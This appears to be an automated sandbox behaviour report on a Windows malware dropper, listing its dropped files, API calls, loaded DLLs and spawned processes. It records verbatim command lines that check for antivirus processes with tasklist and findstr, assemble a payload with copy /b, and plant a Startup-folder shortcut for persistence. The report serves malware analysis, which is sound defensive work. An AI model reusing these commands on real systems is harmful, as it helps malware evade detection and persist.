Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Jessica entropy: 7.99791437325Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Traveller entropy: 7.99707087898Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Fastest entropy: 7.99719426565Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\704579\u entropy: 7.99983843208Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifFile created: C:\Users\user\AppData\Local\TechMesh Dynamics\M entropy: 7.99983843208Jump to dropped file

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F542D5: CreateFileW,DeviceIoControl,CloseHandle,11_2_00F542D5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F48F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00F48F2E
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F55778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00F55778
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DD5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,17_2_00DD5778
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Windows\TripsAstronomyJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Windows\ParadeMorrisonJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Windows\BibliographicHcJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_0040497C0_2_0040497C
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_00406ED20_2_00406ED2
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_004074BB0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00EFB02011_2_00EFB020
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00EF94E011_2_00EF94E0
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00EF9C8011_2_00EF9C80
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F123F511_2_00F123F5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F7840011_2_00F78400
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F2650211_2_00F26502
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00EFE6F011_2_00EFE6F0
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F2265E11_2_00F2265E
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F1282A11_2_00F1282A
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F289BF11_2_00F289BF
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F26A7411_2_00F26A74
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F70A3A11_2_00F70A3A
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F00BE011_2_00F00BE0
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F4EDB211_2_00F4EDB2
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F1CD5111_2_00F1CD51
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F70EB711_2_00F70EB7
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F58E4411_2_00F58E44
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F26FE611_2_00F26FE6
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F133B711_2_00F133B7
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F0D45D11_2_00F0D45D
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F1F40911_2_00F1F409
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F116B411_2_00F116B4
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00EFF6A011_2_00EFF6A0
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00EF166311_2_00EF1663
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F0F62811_2_00F0F628
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F178C311_2_00F178C3
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F1DBA511_2_00F1DBA5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F11BA811_2_00F11BA8
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F29CE511_2_00F29CE5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F0DD2811_2_00F0DD28
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F1BFD611_2_00F1BFD6
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F11FC011_2_00F11FC0
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D7B02017_2_00D7B020
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D794E017_2_00D794E0
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D79C8017_2_00D79C80
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D923F517_2_00D923F5
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DF840017_2_00DF8400
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DA650217_2_00DA6502
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D7E6F017_2_00D7E6F0
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DA265E17_2_00DA265E
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D9282A17_2_00D9282A
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DA89BF17_2_00DA89BF
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DA6A7417_2_00DA6A74
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DF0A3A17_2_00DF0A3A
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D80BE017_2_00D80BE0
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DCEDB217_2_00DCEDB2
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D9CD5117_2_00D9CD51
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DF0EB717_2_00DF0EB7
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DD8E4417_2_00DD8E44
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DA6FE617_2_00DA6FE6
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D933B717_2_00D933B7
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D8D45D17_2_00D8D45D
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D9F40917_2_00D9F409
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D916B417_2_00D916B4
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D7F6A017_2_00D7F6A0
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D7166317_2_00D71663
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D8F62817_2_00D8F628
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D978C317_2_00D978C3
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D91BA817_2_00D91BA8
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D9DBA517_2_00D9DBA5
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DA9CE517_2_00DA9CE5
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D8DD2817_2_00D8DD28
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D9BFD617_2_00D9BFD6
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D91FC017_2_00D91FC0
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: String function: 00F01A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: String function: 00F18B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: String function: 00F10D17 appears 70 times
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: String function: 004062A3 appears 58 times
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: String function: 00D98B30 appears 42 times
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: String function: 00D90D17 appears 70 times
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: String function: 00D81A36 appears 34 times
Source: ldqj18tn.exe, 00000000.00000003.2211110339.00000000005A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs ldqj18tn.exe
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs ldqj18tn.exe
Source: ldqj18tn.exe, 00000000.00000002.2211647425.00000000005A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs ldqj18tn.exe
Source: ldqj18tn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal84.rans.expl.evad.winEXE@28/26@2/0
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F5A6AD GetLastError,FormatMessageW,11_2_00F5A6AD
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F48DE9 AdjustTokenPrivileges,CloseHandle,11_2_00F48DE9
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F49399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00F49399
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DC8DE9 AdjustTokenPrivileges,CloseHandle,17_2_00DC8DE9
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DC9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,17_2_00DC9399
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F54148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,11_2_00F54148
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F5443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,11_2_00F5443D
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifFile created: C:\Users\user\AppData\Local\TechMesh DynamicsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5140:120:WilError_03
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\nskBDCA.tmpJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat
Source: ldqj18tn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\ldqj18tn.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: ldqj18tn.exeReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\ldqj18tn.exeFile read: C:\Users\user\Desktop\ldqj18tn.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\ldqj18tn.exe "C:\Users\user\Desktop\ldqj18tn.exe"
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 704579
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "MARTNMSPIDERRINGTONE" Mh
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Organizational.pif u
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr" "C:\Users\user\AppData\Local\TechMesh Dynamics\M"
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 704579Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "MARTNMSPIDERRINGTONE" Mh Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against uJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Organizational.pif uJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exitJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr" "C:\Users\user\AppData\Local\TechMesh Dynamics\M"Jump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
